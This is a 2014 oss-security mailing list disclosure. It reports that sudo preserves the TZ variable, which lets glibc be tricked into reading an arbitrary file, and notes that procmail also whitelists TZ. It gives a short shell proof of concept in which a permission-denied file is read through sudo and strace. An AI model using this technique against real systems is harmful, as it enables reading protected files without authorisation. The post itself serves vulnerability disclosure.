Date: Thu, 16 Oct 2014 00:35:32 +0200 From: Jakub Wilk <jwilk@...lk.net> To: oss-security@...ts.openwall.com Subject: Abusing TZ for fun (and little profit) By default, sudo preserves the TZ variable from user's environment. This is a bad idea on glibc systems, where TZ can be abused to trick the program to read an arbitrary file. PoC: $ echo moo > tz $ chmod 0 tz $ cat tz cat: tz: Permission denied $ TZ=$PWD/tz sudo -u root strace -e read date read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\300\233\1\0004\0\0\0"..., 512) = 512 read(3, "moo\n", 4096) = 4 read(3, "", 4096) = 0 Wed Oct 15 20:42:42 2014 +++ exited with 0 +++ Procmail is another program that recklessly whitelists TZ.  https://sources.debian.net/src/sudo/1.8.5p2-1%2Bnmu1/plugins/sudoers/env.c/?hl=198#L189  https://sources.debian.net/src/procmail/3.22-20%2Bdeb7u1/config.h/?hl=22#L13 -- Jakub Wilk
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.